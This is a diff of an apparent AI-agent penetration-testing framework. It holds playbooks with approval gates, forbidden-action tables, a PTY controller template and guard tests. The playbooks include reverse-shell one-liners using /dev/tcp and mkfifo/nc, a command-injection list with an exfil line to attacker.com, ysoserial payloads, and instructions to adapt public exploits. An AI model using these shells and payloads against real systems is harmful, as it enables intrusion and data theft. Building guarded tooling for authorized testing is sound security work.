10. **In-place context recovery per objective** — When transitioning between major phases (RECON→VULN RESEARCH→EXPLOITATION→REPORTING), write a structured summary: PTT status, resolved hypotheses, evidence inventory, and any open unknowns into `$ENG_DIR/state/phase-summary.md`. On each phase change, also update `$ENG_DIR/state/checkpoint.json` with the current phase, timestamp, and open items. Never ask the user to start `/new` for compression. If context is at risk of compression, tell the user: *"Context is getting long. Continue in the current session; I will resume from `$ENG_DIR/state/` files."* Re-read `$ENG_DIR/state/ptt.md`, `$ENG_DIR/state/phase-summary.md`, and `$ENG_DIR/state/checkpoint.json` in the current session before the next target-touching action.
|
||||
10. **In-place context recovery per objective** — When transitioning between major phases (RECON→VULN RESEARCH→EXPLOITATION→REPORTING), write a structured summary: PTT status, resolved hypotheses, evidence inventory, and any open unknowns into `$ENG_DIR/state/phase-summary.md`. For every resolved test, preserve the exact command syntax, decisive response, and whether source/parser syntax was confirmed; do not compact an unverified conclusion into a fact. On each phase change, also update `$ENG_DIR/state/checkpoint.json` with the current phase, timestamp, and open items. Never ask the user to start `/new` for compression. If context is at risk of compression, tell the user: *"Context is getting long. Continue in the current session; I will resume from `$ENG_DIR/state/` files."* Re-read `$ENG_DIR/state/ptt.md`, `$ENG_DIR/state/phase-summary.md`, and `$ENG_DIR/state/checkpoint.json` in the current session before the next target-touching action.
|
||||
11. **Tell before do** — Before executing a tool batch, changing phase, or running a major operation, announce to the user what you are about to do, why, with which tool, and what evidence you expect. Wait for acknowledgment before proceeding. Use a plain message or `clarify` — never skip straight to running commands.
|
||||
12. **Summarise after each batch** — After each logical tool batch, give a 3-5 line summary: what ran, key results, evidence saved. Never dump raw command output into the chat — use `write_file` for the full output and summarise.
|
||||
12.1. **Closeout requirements** — Before declaring completion, ensure these shipped artifacts exist and are non-empty: `evidence/reporting/report.md`, `evidence/retrospective/retrospective.md`, `state/phase-summary.md`, and `state/checkpoint.json`. Do not claim a nonexistent `close` CLI gate was run.
|
||||
@@ -168,7 +170,11 @@ The classic failure mode is re-running the same command without recording what i
|
||||
- **Check the history before retrying.** Run `read_file path="$ENG_DIR/state/history.md" offset=<tail-20>` and grep it for the command/endpoint. If it was already run, **do not re-run it unchanged** — change the variable (different host, param, wordlist, technique) or move to a new task.
|
||||
- **A block (`exit 1`) is a signal to diversify, not to retry.** When `check-command` blocks, you must pivot — and **pivot to online research first**, before reaching for another local command. Fire `web_search`/`web_extract` against the failing service/version/error, read back evidence (`read_file $ENG_DIR/hypotheses.md`, `search_files $ENG_DIR/evidence`), open a different PTT task, or switch information source (NVD → ExploitDB → GitHub advisories → CIRCL → OSV → vendor docs). Re-issuing the same command after a block violates the drift guard.
|
||||
- **When stuck, research online before re-running.** The cheapest unstuck move is almost always new information, not another scan. If a command stalls, errors, or yields nothing new: `web_search` the exact error string + tool name, pull the upstream docs / PoC / CVE advisory via `web_extract`, and only then change the variable (different host, param, wordlist, technique) or move to a new task. Treat the `web` capability as a primary recovery lever, not a last resort.
|
||||
- **Five-attempt research trigger.** After five failed attempts against the same feature or exploit class, stop. Re-read captured source first; then research the exact parser, protocol, or primitive; then test one documented variant. If the source is unavailable or the next safe variant is unclear, ask the user for a hint rather than continuing a circular loop.
|
||||
- **False-negative checkpoint.** Before declaring a feature unavailable, stubbed, or not implemented, match the exact test command and argument order against the captured source/parser. Record the command, decisive response, and `verification_status` in the hypothesis. `syntax_uncertain` is not a rejection: it requires a corrected re-test.
|
||||
- **Context boundary.** Prefix controller output with `[VICTIM]`; prefix assessment-host commands and notes with `[ATTACKER]`. `/proc`, `/run`, UNIX sockets, and local service state belong to the machine on which the command runs. Host-local preparation (for example, starting an approved HTTP server or hashing a local artifact) may use the terminal directly; commands sent to a target still use `violin_exec` or one pre-approved `violin_exec_burst`.
|
||||
- **Mandatory research-loop (VULN RESEARCH / EXPLOITATION):** for each detected version/service, record the actual NVD/ExploitDB/GitHub research and update the hypothesis when its semantic state changes (Candidate/Likely/Validated/Rejected). Do not fabricate a hypothesis update merely because another payload ran.
|
||||
- **Research-attempt gate:** before any EXPLOITATION, POST_EXPLOITATION, PRIVESC, or FLAGS target command, the matching hypothesis must contain non-empty `CVE Research` and `Exploit Research` fields. Each field records the online query, source, and outcome. A truthful `no results`, `not applicable`, or `source unavailable` outcome satisfies the attempt requirement; an omitted field blocks execution. Local SearchSploit alone does not satisfy the online attempt.
|
||||
- **Split continuity contract.** Every approved target command is automatically mirrored to `state/history.md`; PTT progress is never automatic. When the bounded window ends and `violin_exec` returns `sync_required`, stop, review the batch evidence, explicitly update the active PTT row, call `violin_sync_done`, then continue.
|
||||
|
||||
**Drift signal:** If the agent starts improvising tasks that are not tied to a phase, playbook, evidence path, and scope item, it must stop, reload this skill, and resume from the correct phase gate. Specifically: if the agent is about to run a target-touching command but cannot point to a `[ ]` PTT entry that justifies it and an existing hypothesis, stop.
|
||||
|
||||
@@ -478,13 +478,13 @@ curl -s -X POST \
|
||||
# Discover WSDL files
|
||||
for path in /service.wsdl /service?wsdl /api.asmx?wsdl /api.svc?wsdl \
|
||||
/endpoint.asmx?WSDL /wsdl /soap/wsdl /soap?wsdl; do
|
||||
code=$(curl -s -o /tmp/soap-test -w "%{http_code}" "https://api.target.com$path")
|
||||
code=$(curl -s -o "$ENG_DIR/evidence/vuln-research/soap-test" -w "%{http_code}" "https://api.target.com$path")
|
||||
echo "$code - $path"
|
||||
[ "$code" = "200" ] && head -50 /tmp/soap-test
|
||||
[ "$code" = "200" ] && head -50 "$ENG_DIR/evidence/vuln-research/soap-test"
|
||||
done
|
||||
|
||||
# Parse WSDL for available operations
|
||||
grep -oP '(?<=<operation name=")[^"]+' /tmp/wsdl.xml 2>/dev/null
|
||||
grep -oP '(?<=<operation name=")[^"]+' "$ENG_DIR/evidence/vuln-research/soap-test" 2>/dev/null
|
||||
```
|
||||
|
||||
### XML Injection & XXE via SOAP
|
||||
|
||||
@@ -216,8 +216,8 @@ curl -s -o /dev/null -w "%{http_code}" 'https://target.com/admin?admin=true'
|
||||
curl -s 'https://target.com/login' -d 'username=admin&password=admin' -w '\nHTTP_CODE: %{http_code}\n'
|
||||
|
||||
# Safe: Demonstrate session fixation (no victim needed)
|
||||
curl -v -c /tmp/session.txt 'https://target.com/login' 2>&1 | grep -i 'set-cookie'
|
||||
curl -b /tmp/session.txt 'https://target.com/dashboard'
|
||||
curl -v -c "$ENG_DIR/evidence/exploitation/auth-bypass-session.txt" 'https://target.com/login' 2>&1 | grep -i 'set-cookie'
|
||||
curl -b "$ENG_DIR/evidence/exploitation/auth-bypass-session.txt" 'https://target.com/dashboard'
|
||||
```
|
||||
|
||||
**Safe PoC rules:**
|
||||
@@ -312,4 +312,4 @@ The following are **never** permitted during authorized testing unless explicitl
|
||||
| **Modifying existing account credentials** | Legitimate user access disruption |
|
||||
| **Account lockout testing** | Denial of service for real users |
|
||||
| **Forging JWT/session tokens to modify data** | Data integrity violation (see JWT playbook for read-only proofs) |
|
||||
|| **Reusing compromised credentials outside scope** | Legal/cross-scope violation |
|
||||
|| **Reusing compromised credentials outside scope** | Legal/cross-scope violation |
|
||||
|
||||
@@ -50,7 +50,7 @@ $(sleep 5)
|
||||
| echo test_injected
|
||||
&& echo test_injected
|
||||
|
||||
# Redirect to accessible files (blind)
|
||||
# Target-side redirect to an accessible temporary file (blind)
|
||||
; echo INJECTED > /tmp/out.txt
|
||||
; curl http://attacker.com/$(whoami) # OOB exfil (BLOCKED without explicit approval)
|
||||
```
|
||||
@@ -182,4 +182,4 @@ The following are **never** permitted during authorized testing unless explicitl
|
||||
| **Persistence** | Adding cron jobs, systemd services, SSH keys, startup scripts |
|
||||
| **Privilege escalation** | `sudo`, `su`, `chmod +s`, kernel exploits |
|
||||
| **Network scanning from compromised host** | Lateral movement |
|
||||
| **Modifying system files** | `/etc/passwd`, `/etc/shadow`, `/etc/sudoers` |
|
||||
| **Modifying system files** | `/etc/passwd`, `/etc/shadow`, `/etc/sudoers` |
|
||||
|
||||
@@ -34,9 +34,9 @@ CSRF occurs when an application allows an attacker to trick a victim's browser i
|
||||
|
||||
# 2. Check if the token changes per request
|
||||
# First request
|
||||
curl -s -c /tmp/cookies.txt "https://target.com/profile" | grep -oE '(csrf|_token)[^"]*"[^"]*"' | head -5
|
||||
curl -s -c "$ENG_DIR/evidence/exploitation/csrf-cookies.txt" "https://target.com/profile" | grep -oE '(csrf|_token)[^"]*"[^"]*"' | head -5
|
||||
# Second request — compare tokens
|
||||
curl -s -b /tmp/cookies.txt -c /tmp/cookies2.txt "https://target.com/profile" | grep -oE '(csrf|_token)[^"]*"[^"]*"'
|
||||
curl -s -b "$ENG_DIR/evidence/exploitation/csrf-cookies.txt" -c "$ENG_DIR/evidence/exploitation/csrf-cookies2.txt" "https://target.com/profile" | grep -oE '(csrf|_token)[^"]*"[^"]*"'
|
||||
|
||||
# 3. Try submitting a request without tokens
|
||||
curl -X POST "https://target.com/api/user/update" \
|
||||
@@ -234,4 +234,4 @@ curl -X PUT "https://target.com/api/Users/1" \
|
||||
|
||||
---
|
||||
|
||||
*Last updated: 2026-07-05 | Gap analysis: CSRF was 100% untested — no CSRF token checks, SameSite cookie analysis, or Origin/Referer validation tests were performed during the engagement.*
|
||||
*Last updated: 2026-07-05 | Gap analysis: CSRF was 100% untested — no CSRF token checks, SameSite cookie analysis, or Origin/Referer validation tests were performed during the engagement.*
|
||||
|
||||
@@ -156,7 +156,7 @@ Use benign gadget chains that demonstrate code execution without causing damage:
|
||||
# Safe: DNS lookup to confirm code execution (no data exfiltrated)
|
||||
java -jar ysoserial.jar CommonsCollections5 'nslookup attacker-controlled-domain.com' | base64 -w0
|
||||
|
||||
# Safe: Touch a file in /tmp (no damage, visible to tester only)
|
||||
# Remote target: touch a /tmp proof file (no damage, visible to tester only)
|
||||
java -jar ysoserial.jar CommonsCollections5 'touch /tmp/pentest-proof-$(whoami)'
|
||||
```
|
||||
|
||||
@@ -272,4 +272,4 @@ The following are **never** permitted during authorized testing unless explicitl
|
||||
| **Modifying system configuration** | Service disruption, security control bypass |
|
||||
| **Deleting or modifying files** | Data integrity violation |
|
||||
| **Denial of service via resource exhaustion** | Service disruption |
|
||||
| **Cryptominer or malware payloads** | Abuse of computing resources |
|
||||
| **Cryptominer or malware payloads** | Abuse of computing resources |
|
||||
|
||||
@@ -72,6 +72,7 @@ Before **any** exploitation activity, obtain explicit approval via `clarify`. Th
|
||||
|
||||
> 🔴 **FIRST ACTION — ONLINE EXPLOIT SEARCH (MANDATORY).** The moment a CVE/finding is selected, your **first tool call must be an online search for existing exploit scripts to review and adapt** — never `code_execution`/`write_file` to draft your own. Writing a custom exploit is the **LAST RESORT**, only when no public PoC exists.
|
||||
> **Search:** `searchsploit <CVE>` / `<product> <version>` · `gh search repos '<CVE> PoC' --sort stars` · `gh search code '<CVE>'` · `web_search '<CVE> exploit'` + `'<CVE> PoC github'`. Check Metasploit/Nuclei for an existing module first. Record every hit (URL/EDB-id/repo) in the hypothesis **Research Log** with an `Updated:` timestamp.
|
||||
> **Guard requirement:** before the first exploit command, update the matching hypothesis with non-empty `CVE Research` and `Exploit Research` fields containing each online query, source, and outcome. The attempt is mandatory, not a successful match: record truthful `no results`, `not applicable`, or `source unavailable` outcomes when necessary. Local SearchSploit alone does not satisfy the online research attempt.
|
||||
|
||||
### 1. Review & Adapt the Found Script
|
||||
- **Safety**: no destructive side effects, hardcoded IPs, exfiltration, or out-of-scope targets
|
||||
@@ -195,6 +196,17 @@ context compression:** persist all active theories with status + next steps;
|
||||
`read_file` the board before any new tool batch after resume. **On Validated:**
|
||||
create the finding entry and link `H-xxx → FIND-xxx` with evidence path.
|
||||
|
||||
### Source Code Verification Checkpoint
|
||||
|
||||
Before classifying a captured feature as broken, a stub, or a dead end, re-read
|
||||
the implementation and compare the test to the exact parser or regex: argument
|
||||
names, order, delimiters, framing, encoding, and expected size/length fields.
|
||||
Record the exact test command, decisive response, and a verification status in
|
||||
the hypothesis. A failed test with `syntax_uncertain` is a pending re-test, not
|
||||
a rejected exploit path. After five failed attempts in one exploit class, stop
|
||||
testing, re-read the source, research the specific technique, and only then try
|
||||
a documented variant or ask the user for direction.
|
||||
|
||||
---
|
||||
|
||||
## Chain Exploits
|
||||
@@ -248,7 +260,7 @@ mechanisms below.
|
||||
|-----------|------|-------|
|
||||
| **nc `-e` / `-c` pipe to a listener** | Quick connectivity PoC | Flaky: depends on `nc` build (`-e` not in traditional BSD nc), firewall on the listener side, and a long-lived local `nc -lvnp` you must keep open. Prefer the redirect form. |
|
||||
| **`bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1`** | Bash target | Standard, reliable when bash + outbound TCP are allowed. Capture output by piping through `tee` to a file you later `read_file`. |
|
||||
| **Named pipe + `nc` read loop** (`mkfifo /tmp/p; cat /tmp/p \| nc LHOST LPORT \| /bin/sh >/tmp/p`) | Stable interactive-ish shell | Captures both stdin echo and stdout; write transcripts to a file under `$ENG_DIR/evidence/exploitation/`. |
|
||||
| **Named pipe + `nc` read loop** (`mkfifo /tmp/p; cat /tmp/p \| nc LHOST LPORT \| /bin/sh >/tmp/p`) | Remote target only: stable interactive-ish shell | Captures both stdin echo and stdout; write local transcripts under `$ENG_DIR/evidence/exploitation/`. |
|
||||
| **Command output redirected to a file, exfil by `cat`/base64 over the same channel** | When nc exfil is blocked | Avoid raw `nc` exfil of large binaries — it is unreliable and noisy. |
|
||||
|
||||
> ⚠️ **Non-local backend limitation:** if the agent's command execution runs on
|
||||
@@ -256,12 +268,30 @@ mechanisms below.
|
||||
> worker), a reverse shell it spawns cannot reach a listener on your laptop, and
|
||||
> the agent has **no way to read the remote shell's stdout live**. In that case,
|
||||
> prove the shell with a one-shot command that writes to a known location
|
||||
> (`whoami > /tmp/pwn.txt`) and retrieve it via an approved file-read, rather
|
||||
> (`whoami > /tmp/pwn.txt` on the remote target) and retrieve it via an approved file-read, rather
|
||||
> than relying on interactive output.
|
||||
|
||||
> ⚠️ **Flaky exfil:** raw `nc` file exfil is lossy and often drops the tail of
|
||||
> large outputs. For evidence, prefer writing the result to a file and pulling it
|
||||
> with an approved read over the control channel, or `base64`-encode and chunk it.
|
||||
> with an approved read over the control channel. Do not use base64-over-PTY
|
||||
> for scripts or files: delivery must use the verified HTTP pattern below.
|
||||
|
||||
### PTY-Safe File Delivery and Controller Context
|
||||
|
||||
For an authorized target, use HTTP delivery as the default for scripts and
|
||||
other files: serve the artifact from the assessment host, retrieve it with the
|
||||
target's approved HTTP client, compare SHA-256 on both sides, and only then
|
||||
run it. Do **not** send scripts through base64-over-PTY: line discipline can
|
||||
silently corrupt long lines (observed around 400 bytes), making a syntax error
|
||||
or failed feature test untrustworthy.
|
||||
|
||||
Use `templates/shell_ctrl.py` only with an established, authorized PTY. It
|
||||
refuses oversized lines and labels returned output `[VICTIM]`; it deliberately
|
||||
does not implement file transfer. Use the HTTP-and-SHA-256 pattern in
|
||||
`references/pty-safe-delivery.md` for delivery. Treat controller traffic as
|
||||
target interaction: run it through one scoped, pre-approved burst and reconcile
|
||||
the active PTT task when that burst ends. Commands that only prepare the
|
||||
assessment host are local work, not a substitute for guarded target execution.
|
||||
|
||||
### Documentation after a reverse-shell PoC
|
||||
- Record the listener (`LHOST:LPORT`), payload, and the exact command in the
|
||||
@@ -295,4 +325,4 @@ mechanisms below.
|
||||
|
||||
See `.hermes.md` "Forbidden Behaviour" for the full blocked list. Any deviation
|
||||
requires written approval from the client and engagement lead, documented in the
|
||||
test plan before execution.
|
||||
test plan before execution.
|
||||
|
||||
@@ -73,16 +73,16 @@ GET /api/v2/users (versioned API may have weaker auth on v2)
|
||||
### Example: curl IDOR probe
|
||||
```bash
|
||||
# Authenticate and save session cookie
|
||||
curl -c /tmp/cookies.txt -b /tmp/cookies.txt \
|
||||
curl -c "$ENG_DIR/evidence/exploitation/idor-cookies.txt" -b "$ENG_DIR/evidence/exploitation/idor-cookies.txt" \
|
||||
'http://target.com/api/user/2'
|
||||
# Compare with user/1 — different data indicates IDOR
|
||||
```
|
||||
|
||||
### Example: ffuf for ID enumeration
|
||||
```bash
|
||||
seq 1 100 > /tmp/ids.txt
|
||||
seq 1 100 > "$ENG_DIR/evidence/exploitation/idor-ids.txt"
|
||||
ffuf -u 'http://target.com/api/user/FUZZ' \
|
||||
-w /tmp/ids.txt \
|
||||
-w "$ENG_DIR/evidence/exploitation/idor-ids.txt" \
|
||||
-b 'session=YOUR_SESSION_COOKIE' \
|
||||
-mc 200 -fc 403,404,500
|
||||
```
|
||||
|
||||
@@ -28,7 +28,8 @@
|
||||
> if [ -z "${VIOLIN_ENG_ROOT:-}" ]; then
|
||||
> VIOLIN_ENG_ROOT="$(python scripts/violin_guard.py eng-root 2>/dev/null | sed -n 's/^ENG_ROOT=//p')"
|
||||
> fi
|
||||
> ENG_DIR="${VIOLIN_ENG_ROOT:-$HOME}/engagements/<target>-$(date +%F)"
|
||||
> ENG_ROOT="$(python scripts/violin_guard.py eng-root | sed -n 's/^ENG_ROOT=//p')"
|
||||
> ENG_DIR="$ENG_ROOT/engagements/<target>-$(date +%F)"
|
||||
> mkdir -p "$ENG_DIR/evidence/recon/{passive,tech,active}"
|
||||
> echo "Project: $ENG_DIR"
|
||||
> ```
|
||||
@@ -422,8 +423,9 @@ Recon is considered **complete** and the engagement can proceed to the next phas
|
||||
|
||||
1. **Active recon complete** — Phase 3 port scanning, service detection, directory brute-force, nuclei, and subdomain takeover checks have all finished
|
||||
2. **Attack surface summarised** — a concise summary of discovered hosts, ports, services, technologies, and potential vulnerabilities has been produced
|
||||
3. **No scope violations** — all scanned targets and ports are within the agreed scope; out-of-scope targets found during recon (e.g., third-party services) are noted but not probed
|
||||
4. **User hasn't paused** — the operator has not issued a stop or pause signal at any point
|
||||
3. **Online research attempted** — for every discovered product/version, unusual service, and candidate vulnerability that may advance, run online CVE/advisory and exploit/PoC searches and record the query, source, and outcome in the matching hypothesis fields (`CVE Research`, `Exploit Research`). Truthful no-results/not-applicable/source-unavailable outcomes count; silently skipping does not.
|
||||
4. **No scope violations** — all scanned targets and ports are within the agreed scope; out-of-scope targets found during recon (e.g., third-party services) are noted but not probed
|
||||
5. **User hasn't paused** — the operator has not issued a stop or pause signal at any point
|
||||
|
||||
If any condition is not met, recon continues or pauses accordingly.
|
||||
|
||||
@@ -444,4 +446,4 @@ If any condition is not met, recon continues or pauses accordingly.
|
||||
|
||||
- Scanning without phase approval
|
||||
- Aggressive scanning against production without explicit authorization
|
||||
- OSINT against non-target organizations
|
||||
- OSINT against non-target organizations
|
||||
|
||||
@@ -26,7 +26,8 @@ Use the guard CLI rather than manually copying templates. It creates the
|
||||
scope, PTT, hypothesis board, and command history:
|
||||
|
||||
```bash
|
||||
ENG_DIR="engagements/<target-name>-$(date +%F)"
|
||||
ENG_ROOT="$(python3 scripts/violin_guard.py eng-root | sed -n 's/^ENG_ROOT=//p')"
|
||||
ENG_DIR="$ENG_ROOT/engagements/<target-name>-$(date +%F)"
|
||||
python3 scripts/violin_guard.py init-engagement --host <target-ip> "$ENG_DIR"
|
||||
|
||||
# Authorized HTB/CTF lab: ready-to-test scope, active RECON task, and skill marker.
|
||||
|
||||
@@ -146,8 +146,8 @@ for tag_id, value in exif.items():
|
||||
```bash
|
||||
# Safe: Show hidden metadata in uploaded images
|
||||
# Download an image and extract its EXIF GPS coordinates
|
||||
curl -s "https://target.com/assets/images/photo.jpg" > /tmp/photo.jpg
|
||||
exiftool /tmp/photo.jpg 2>/dev/null | grep -iE "(GPS|Latitude|Longitude|Artist|Creator)" | head -10
|
||||
curl -s "https://target.com/assets/images/photo.jpg" > "$ENG_DIR/evidence/vuln-research/photo.jpg"
|
||||
exiftool "$ENG_DIR/evidence/vuln-research/photo.jpg" 2>/dev/null | grep -iE "(GPS|Latitude|Longitude|Artist|Creator)" | head -10
|
||||
|
||||
# Safe: Show hidden data in JavaScript bundles
|
||||
curl -s "https://target.com/main.js" | grep -c '"' && echo "strings found in main.js"
|
||||
@@ -202,4 +202,4 @@ curl -s "https://target.com/" | grep -oE '"[A-Za-z0-9+/=]{20,}"' | head -3
|
||||
|
||||
---
|
||||
|
||||
*Last updated: 2026-07-05 | Gap analysis: Security-through-obscurity was 100% untested — Blockchain Hype, Steganography, Privacy Policy Inspection all missed. Playbook covers image steganography, metadata extraction, hidden data in JS, and blockchain/NFT analysis.*
|
||||
*Last updated: 2026-07-05 | Gap analysis: Security-through-obscurity was 100% untested — Blockchain Hype, Steganography, Privacy Policy Inspection all missed. Playbook covers image steganography, metadata extraction, hidden data in JS, and blockchain/NFT analysis.*
|
||||
|
||||
@@ -279,6 +279,12 @@ nmap -sV target.com -oA $ENG_DIR/evidence/vuln-research/H-001-nmap-services
|
||||
|
||||
## Research Triggers
|
||||
|
||||
For every hypothesis that may advance to exploitation, persist both `CVE Research`
|
||||
and `Exploit Research` on the hypothesis using `violin_record_hypothesis`. Record
|
||||
the online query, source URL/name, and outcome. Searches only have to be attempted:
|
||||
truthful `no results`, `not applicable`, and `source unavailable` outcomes are
|
||||
valid. Missing fields are not valid and the guard blocks exploit execution.
|
||||
|
||||
Web research is **trigger-based** — specific discoveries automatically prompt
|
||||
research actions. This is not a separate phase; it happens continuously during
|
||||
recon and vuln research whenever a trigger condition is met.
|
||||
|
||||
@@ -0,0 +1,29 @@
|
||||
# PTY-Safe Delivery
|
||||
|
||||
Use this pattern only for an approved, in-scope target. PTYs can corrupt or
|
||||
drop long, rapid input lines without an obvious error. Base64-over-PTY is not a
|
||||
safe transport for scripts; do not use it for payload delivery.
|
||||
|
||||
## Default: HTTP plus SHA-256
|
||||
|
||||
On the assessment host, place the reviewed artifact under
|
||||
`$ENG_DIR/exploits/`, calculate its SHA-256, and serve that directory with a
|
||||
short-lived HTTP server. On the target, retrieve the artifact with its approved
|
||||
HTTP client, calculate SHA-256 there, and compare the two hashes before any
|
||||
execution. Save both hash outputs and the retrieval command under
|
||||
`$ENG_DIR/evidence/exploitation/`.
|
||||
|
||||
If hashes differ, delete the remote copy, stop the attempt, and re-deliver by
|
||||
HTTP. Do not compensate by making PTY/base64 chunks smaller.
|
||||
|
||||
## Controller rules
|
||||
|
||||
- Controller output starts with `[VICTIM]`; assessment-host commands and notes
|
||||
start with `[ATTACKER]`.
|
||||
- A controller may send short commands and collect a bounded transcript. It
|
||||
must reject long input lines rather than silently splitting or transforming
|
||||
them.
|
||||
- Verify file delivery with SHA-256 before execution; a command marker only
|
||||
verifies command completion, not file integrity.
|
||||
- `/proc`, `/run`, and UNIX sockets are local to the machine running the
|
||||
command. Confirm the target context before inspecting them.
|
||||
@@ -10,6 +10,7 @@ Use this reference during the mandatory final engagement phase. Real-world targe
|
||||
4. **Novel discovery log** — every repeatable new technique, bypass, payload family, workflow, or pitfall is added to the relevant playbook immediately.
|
||||
5. **Client feedback loop** — if the client later reports a missed issue, patch the relevant playbook and add a detection gate to `playbooks/vuln-research.md`.
|
||||
6. **Recent-CVE follow-up** — after delivery, check whether new CVEs affect the identified technology stack and record any follow-up recommendations.
|
||||
7. **False-rejection review** — inspect every Rejected hypothesis. Confirm it records the exact test command and response, a source/parser-verified status, and a rejection reason. Reopen any `syntax_uncertain` or `not_tested` item; document where an incorrect rejection caused circular testing or delayed the valid path.
|
||||
|
||||
## Coverage Matrix
|
||||
|
||||
@@ -29,6 +30,7 @@ When updating a playbook from the retrospective, ensure the update includes:
|
||||
- exact safe command or probe pattern,
|
||||
- evidence path under `$ENG_DIR/evidence/...`,
|
||||
- confidence transition guidance (Candidate → Likely → Validated / Rejected),
|
||||
- false-negative safeguards: exact parser/regex contract, tested syntax, response, and rejection reason,
|
||||
- stop conditions and blocked actions,
|
||||
- remediation guidance.
|
||||
|
||||
|
||||
@@ -26,7 +26,8 @@ Resolve the engagement root to the same canonical tree the scoping bootstrap cre
|
||||
if [ -z "${VIOLIN_ENG_ROOT:-}" ]; then
|
||||
VIOLIN_ENG_ROOT="$(python scripts/violin_guard.py eng-root 2>/dev/null | sed -n 's/^ENG_ROOT=//p')"
|
||||
fi
|
||||
ENG_DIR="${VIOLIN_ENG_ROOT:-$HOME}/engagements/<target>-$(date +%F)"
|
||||
ENG_ROOT="$(python scripts/violin_guard.py eng-root | sed -n 's/^ENG_ROOT=//p')"
|
||||
ENG_DIR="$ENG_ROOT/engagements/<target>-$(date +%F)"
|
||||
```
|
||||
|
||||
Each phase playbook appends its own `mkdir -p "$ENG_DIR/evidence/<phase>/..."` after this.
|
||||
|
||||
@@ -29,6 +29,12 @@ Candidate ──► Likely ──► Validated
|
||||
- **Vuln class:** <SQLi | XSS | IDOR | SSRF | ...>
|
||||
- **Rationale:** <why you think this might be vulnerable>
|
||||
- **Evidence:** $ENG_DIR/evidence/<phase>/<file>
|
||||
- **CVE Research:** <online query + source URL + outcome; use no results/not applicable/source unavailable when truthful>
|
||||
- **Exploit Research:** <online PoC/exploit query + source URL + outcome; use no results/source unavailable when truthful>
|
||||
- **Test Command:** <exact syntax tested, including argument order>
|
||||
- **Test Response:** <exact decisive response/error>
|
||||
- **Verification Status:** <syntax_confirmed | syntax_uncertain | not_implemented | not_tested>
|
||||
- **Rejection Reason:** <required only for Rejected; syntax-uncertain tests must stay active for corrected re-test>
|
||||
- **Next step:** <what to do next to confirm or reject>
|
||||
- **Linked findings:** <FIND-001 or none>
|
||||
- **Updated:** <YYYY-MM-DD HH:MM>
|
||||
|
||||
@@ -0,0 +1,55 @@
|
||||
"""Transport-agnostic safeguards for an authorized reverse-shell PTY.
|
||||
|
||||
Wire ``send_line`` and ``read_until`` to an already established controller.
|
||||
This template intentionally has no network listener and no file-transfer path:
|
||||
use HTTP plus SHA-256 for files instead of base64 through a PTY.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
import secrets
|
||||
from collections.abc import Callable
|
||||
|
||||
MAX_PTY_LINE_BYTES = 320
|
||||
|
||||
|
||||
class PtyShellController:
|
||||
def __init__(self, send_line: Callable[[str], None], read_until: Callable[[str], str]) -> None:
|
||||
self._send_line = send_line
|
||||
self._read_until = read_until
|
||||
|
||||
def run(self, command: str) -> tuple[int, str]:
|
||||
"""Send one short command and return labelled output plus its exit code."""
|
||||
if not command.strip():
|
||||
raise ValueError("command must not be empty")
|
||||
if "\n" in command or "\r" in command:
|
||||
raise ValueError("send one command line at a time")
|
||||
if len(command.encode("utf-8")) > MAX_PTY_LINE_BYTES:
|
||||
raise ValueError("PTY command is too long; deliver files over HTTP, not this channel")
|
||||
marker = f"__VIOLIN_DONE_{secrets.token_hex(8)}__"
|
||||
wrapped = f"{command}; printf '\\n{marker}=%s\\n' \"$?\""
|
||||
if len(wrapped.encode("utf-8")) > MAX_PTY_LINE_BYTES:
|
||||
raise ValueError("wrapped PTY command is too long; use an HTTP-delivered script")
|
||||
self._send_line(wrapped)
|
||||
transcript = self._read_until(marker)
|
||||
marker_line = next(
|
||||
(line for line in transcript.splitlines() if line.startswith(marker + "=")), ""
|
||||
)
|
||||
if not marker_line:
|
||||
raise RuntimeError("controller did not receive the command completion marker")
|
||||
try:
|
||||
exit_code = int(marker_line.partition("=")[2])
|
||||
except ValueError as exc:
|
||||
raise RuntimeError("invalid command completion marker") from exc
|
||||
output = "\n".join(
|
||||
f"[VICTIM] {line}" for line in transcript.splitlines() if line != marker_line
|
||||
)
|
||||
return exit_code, output
|
||||
|
||||
|
||||
def sha256_matches(local_path: str, victim_digest: str) -> bool:
|
||||
"""Compare a local artifact with a SHA-256 value collected from the victim."""
|
||||
with open(local_path, "rb") as artifact:
|
||||
local_digest = hashlib.file_digest(artifact, "sha256").hexdigest()
|
||||
return local_digest.lower() == victim_digest.strip().lower()
|
||||
@@ -197,6 +197,8 @@ def test_post_exploitation_requires_scope_and_skill_load(tmp_path):
|
||||
+ (
|
||||
f"\n### H-001: Post-exploit persistence\n- **Status:** Candidate\n"
|
||||
f"- **Phase:** POST_EXPLOITATION\n- **Target:** 10.10.10.10\n"
|
||||
f"- **CVE Research:** web_search persistence CVE; NVD; not applicable\n"
|
||||
f"- **Exploit Research:** web_search persistence technique; vendor docs; no results\n"
|
||||
f"- **Updated:** {ts} UTC\n"
|
||||
),
|
||||
encoding="utf-8",
|
||||
|
||||
@@ -40,6 +40,8 @@ def test_adapter_builders_are_structured_and_bounded():
|
||||
adapters.build_nmap({"target": "10.0.0.1", "ports": "80,443"})
|
||||
== "nmap -sCV -p 80,443 10.0.0.1"
|
||||
)
|
||||
with pytest.raises(adapters.AdapterError, match="1-65535"):
|
||||
adapters.build_nmap({"target": "10.0.0.1", "ports": "-p-"})
|
||||
assert "FUZZ" in adapters.build_ffuf(
|
||||
{
|
||||
"url": "http://10.0.0.1/FUZZ",
|
||||
|
||||
@@ -54,6 +54,7 @@ TOOLS = _load_sub("tools", _PLUGIN / "tools.py")
|
||||
|
||||
# Import core modules from the new location
|
||||
from plugins.violin_guard.core import bootstrap, command, execution, hypotheses, ptt, state
|
||||
from plugins.violin_guard.core.targets import extract_target_candidates
|
||||
|
||||
|
||||
def _cp(code, out="", err=""):
|
||||
@@ -251,6 +252,157 @@ def test_recon_does_not_require_hypothesis(tmp_path):
|
||||
assert any("hypothesis guard:" in warning for warning in research3.warnings)
|
||||
|
||||
|
||||
def test_target_scanner_ignores_dotted_files_and_handles_dev_tcp_endpoint():
|
||||
candidates = extract_target_candidates(
|
||||
"python3 server.py --output 01-nmap-full.txt "
|
||||
"bash -c 'sock.close(); s.close(); echo test > /dev/tcp/10.10.15.65/4445'"
|
||||
)
|
||||
|
||||
assert "10.10.15.65" in candidates
|
||||
assert "10.10.15.65/44" not in candidates
|
||||
assert "server.py" not in candidates
|
||||
assert "01-nmap-full.txt" not in candidates
|
||||
assert "sock.close" not in candidates
|
